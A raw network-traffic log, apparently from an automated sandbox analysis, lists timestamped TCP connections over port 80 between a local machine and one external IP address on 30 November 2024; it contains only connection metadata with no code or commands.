                                        Nov 30, 2024 22:35:47.821243048 CET8049736213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:48.059494972 CET4973680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:48.179683924 CET8049736213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:48.179699898 CET8049736213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:48.179713011 CET8049736213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:49.007854939 CET8049736213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:49.059426069 CET4973680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:49.240472078 CET8049736213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:49.293720007 CET4973680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:49.372641087 CET4973880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:49.492836952 CET8049738213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:49.492934942 CET4973880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:49.493200064 CET4973880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:49.613215923 CET8049738213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:49.890350103 CET4973880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:50.010817051 CET8049738213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:50.010828018 CET8049738213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:50.010837078 CET8049738213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:50.906115055 CET8049738213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:50.950011015 CET4973880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:51.159209013 CET8049738213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:51.199985981 CET4973880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:51.278332949 CET4973880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:51.278609991 CET4974080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:51.398629904 CET8049740213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:51.398705959 CET8049738213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:51.398716927 CET4974080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:51.398782015 CET4973880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:51.399032116 CET4974080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:51.518966913 CET8049740213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:51.747014999 CET4974080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:51.867062092 CET8049740213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:51.867084026 CET8049740213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:51.867125034 CET8049740213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:52.310229063 CET4974180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:52.317598104 CET4974080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:52.430283070 CET8049741213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:52.430358887 CET4974180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:52.430706024 CET4974180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:52.450407028 CET4974280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:52.480704069 CET8049740213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:52.483716965 CET8049740213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:52.483812094 CET4974080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:52.550641060 CET8049741213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:52.571124077 CET8049742213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:52.571316004 CET4974280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:52.572865963 CET4974280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:52.692756891 CET8049742213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:52.778690100 CET4974180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:52.898861885 CET8049741213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:52.899288893 CET8049741213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:52.920094967 CET4974280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:53.040174007 CET8049742213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:53.040184975 CET8049742213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:53.040271997 CET8049742213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:53.893058062 CET8049742213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:53.934442997 CET4974280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:54.128705025 CET8049742213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:54.184473991 CET4974280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:54.245953083 CET4974280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:54.246404886 CET4974380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:54.366436005 CET8049743213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:54.366532087 CET4974380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:54.366714001 CET4974380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:54.366803885 CET8049742213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:54.366858006 CET4974280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:54.486705065 CET8049743213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:54.715827942 CET4974380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:54.794349909 CET8049736213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:54.795644045 CET4973680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:54.823888063 CET8049741213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:54.836057901 CET8049743213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:54.836091995 CET8049743213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:54.836103916 CET8049743213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:54.871939898 CET4974180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:55.065795898 CET8049741213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:55.121985912 CET4974180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:55.731688976 CET8049743213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:55.778211117 CET4974380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:55.970105886 CET8049743213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:56.012548923 CET4974380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:56.182966948 CET4974180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:56.183022976 CET4974380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:56.183443069 CET4974480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:56.225744009 CET4973680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:56.304729939 CET8049741213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:56.304843903 CET8049744213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:56.304867983 CET4974180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:56.304918051 CET4974480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:56.305135012 CET4974480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:56.305164099 CET8049743213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:56.305210114 CET4974380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:56.425698042 CET8049744213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:56.654090881 CET4974480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:56.774197102 CET8049744213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:56.774224997 CET8049744213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:56.774235010 CET8049744213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:58.772268057 CET8049744213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:58.825036049 CET4974480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:59.164283037 CET4974480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:59.168042898 CET4974580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:59.284826994 CET8049744213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:59.284981012 CET4974480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:59.288119078 CET8049745213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:59.288193941 CET4974580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:59.298748970 CET4974580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:59.418795109 CET8049745213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:59.653382063 CET4974580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:35:59.773477077 CET8049745213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:59.773493052 CET8049745213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:35:59.773511887 CET8049745213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:00.075979948 CET4974680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:00.076328993 CET4974580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:00.195921898 CET8049746213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:00.196168900 CET4974680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:00.196237087 CET4974680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:00.199146032 CET4974780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:00.236865997 CET8049745213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:00.301812887 CET8049745213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:00.302018881 CET4974580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:00.316271067 CET8049746213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:00.319140911 CET8049747213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:00.319226980 CET4974780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:00.319439888 CET4974780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:00.439382076 CET8049747213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:00.543950081 CET4974680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:00.664016962 CET8049746213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:00.664057970 CET8049746213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:00.668963909 CET4974780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:00.789220095 CET8049747213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:00.789253950 CET8049747213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:00.789273024 CET8049747213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:01.558008909 CET8049746213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:01.606295109 CET4974680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:01.798051119 CET8049746213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:01.836359024 CET8049747213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:01.840740919 CET4974680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:01.887634039 CET4974780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:02.091310024 CET8049747213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:02.137579918 CET4974780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:02.377932072 CET4974680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:02.378016949 CET4974780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:02.378413916 CET4974880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:02.498416901 CET8049748213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:02.498558998 CET4974880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:02.498579025 CET8049746213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:02.498625040 CET4974680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:02.498795986 CET4974880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:02.499145985 CET8049747213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:02.499227047 CET4974780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:02.619019985 CET8049748213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:02.856750011 CET4974880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:02.977823019 CET8049748213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:02.977835894 CET8049748213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:02.977859020 CET8049748213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:03.906862020 CET8049748213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:03.950225115 CET4974880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:04.159184933 CET8049748213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:04.200237036 CET4974880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:04.288142920 CET4974980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:04.408199072 CET8049749213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:04.408387899 CET4974980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:04.408565998 CET4974980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:04.529158115 CET8049749213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:04.765516996 CET4974980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:04.886723995 CET8049749213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:04.886769056 CET8049749213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:04.886816025 CET8049749213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:06.045859098 CET8049749213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:06.090837002 CET4974980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:06.168239117 CET4974980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:06.168416023 CET4975080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:06.288420916 CET8049750213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:06.288611889 CET8049749213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:06.288762093 CET4975080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:06.288774014 CET4974980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:06.288997889 CET4975080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:06.408917904 CET8049750213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:06.639269114 CET4975080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:06.759396076 CET8049750213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:06.759460926 CET8049750213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:06.759475946 CET8049750213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:06.810421944 CET4975080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:06.810508013 CET4975180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:06.930495977 CET8049751213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:06.933725119 CET4975280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:06.933819056 CET4975180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:06.933991909 CET4975180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:06.977484941 CET8049750213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:07.053862095 CET8049752213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:07.053977966 CET4975280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:07.053987980 CET8049751213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:07.054213047 CET4975280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:07.175175905 CET8049752213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:07.278516054 CET4975180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:07.375533104 CET8049750213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:07.375657082 CET4975080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:07.398905039 CET8049751213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:07.398942947 CET8049751213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:07.407320976 CET4975280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:07.528265953 CET8049752213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:07.528285980 CET8049752213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:07.528301001 CET8049752213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:08.383830070 CET8049752213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:08.420058966 CET8049751213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:08.434506893 CET4975280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:08.465738058 CET4975180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:08.678127050 CET8049751213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:08.731411934 CET4975180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:08.915296078 CET8049748213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:08.915452957 CET4974880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:09.366926908 CET8049752213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:09.418888092 CET4975280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:09.496624947 CET4975180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:09.496711969 CET4975280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:09.496912003 CET4975380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:09.618041039 CET8049753213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:09.618238926 CET8049751213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:09.618416071 CET4975180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:09.618573904 CET4975380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:09.618684053 CET4975380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:09.618709087 CET8049752213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:09.621812105 CET4975280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:09.739073992 CET8049753213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:09.965872049 CET4975380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:10.086371899 CET8049753213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:10.086402893 CET8049753213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:10.086417913 CET8049753213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:13.701224089 CET4975480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:13.705480099 CET4975380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:13.821321964 CET8049754213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:13.821413040 CET4975480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:13.822396994 CET4975480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:13.825676918 CET8049753213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:13.825738907 CET4975380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:13.942370892 CET8049754213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:14.074073076 CET4975580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:14.171077013 CET4975480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:14.194348097 CET8049755213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:14.194447994 CET4975580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:14.194632053 CET4975580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:14.291290045 CET8049754213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:14.291307926 CET8049754213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:14.314804077 CET8049755213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:14.544161081 CET4975580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:14.665586948 CET8049755213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:14.665608883 CET8049755213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:14.665617943 CET8049755213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:15.237206936 CET8049754213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:15.278352022 CET4975480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:15.548561096 CET8049755213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:15.590905905 CET4975580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:15.789858103 CET8049755213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:15.840846062 CET4975580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:15.917469025 CET4975580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:15.917821884 CET4975680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:16.037904978 CET8049756213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:16.037930012 CET8049755213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:16.038008928 CET4975680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:16.038033962 CET4975580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:16.038217068 CET4975680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:16.158217907 CET8049756213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:16.239902020 CET8049754213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:16.293941975 CET4975480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:16.388144016 CET4975680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:16.508362055 CET8049756213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:16.508387089 CET8049756213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:16.508399963 CET8049756213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:17.514615059 CET8049756213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:17.559742928 CET4975680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:18.554663897 CET8049756213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:18.606481075 CET4975680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:18.685030937 CET4975480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:18.685111046 CET4975680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:18.685272932 CET4975780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:18.805262089 CET8049757213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:18.805365086 CET4975780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:18.805385113 CET8049754213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:18.805634975 CET4975780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:18.805664062 CET4975480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:18.805850983 CET8049756213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:18.805955887 CET4975680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:18.926737070 CET8049757213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:19.153520107 CET4975780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:19.273799896 CET8049757213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:19.273828983 CET8049757213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:19.273834944 CET8049757213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:20.208939075 CET8049757213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:20.262772083 CET4975780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:20.470192909 CET8049757213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:20.477360010 CET4975780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:20.598736048 CET8049757213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:20.598895073 CET4975780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:20.607273102 CET4975880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:20.727324963 CET8049758213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:20.727422953 CET4975880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:20.727616072 CET4975880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:20.847784042 CET8049758213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:21.075408936 CET4975880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:21.195835114 CET8049758213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:21.195878983 CET8049758213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:21.195890903 CET8049758213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:21.248091936 CET4975880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:21.248186111 CET4975980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:21.368169069 CET8049759213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:21.368263960 CET4975980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:21.368422985 CET4975980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:21.371849060 CET4976080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:21.409157991 CET8049758213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:21.488325119 CET8049759213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:21.491842985 CET8049760213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:21.491967916 CET4976080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:21.492160082 CET4976080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:21.612098932 CET8049760213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:21.716010094 CET4975980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:21.836374998 CET8049759213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:21.836395979 CET8049759213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:21.841487885 CET4976080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:21.961612940 CET8049760213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:21.961627960 CET8049760213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:21.961643934 CET8049760213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:22.741178036 CET8049759213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:22.772069931 CET8049758213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:22.772494078 CET4975880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:22.809655905 CET4975980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:22.982412100 CET8049759213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:23.028419971 CET4975980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:23.198532104 CET8049760213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:23.247190952 CET4976080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:23.329448938 CET4975980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:23.329514980 CET4976080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:23.329976082 CET4976180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:23.449815035 CET8049759213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:23.449883938 CET8049761213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:23.449970007 CET4976180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:23.449974060 CET4975980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:23.450139046 CET4976180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:23.450161934 CET8049760213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:23.450257063 CET4976080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:23.570049047 CET8049761213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:23.794226885 CET4976180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:23.930346012 CET8049761213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:23.930377960 CET8049761213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:23.930416107 CET8049761213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:24.940658092 CET8049761213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:24.981539011 CET4976180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:36:25.521214962 CET8049761213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:36:25.575334072 CET4976180192.168.2.4213.108.22.118
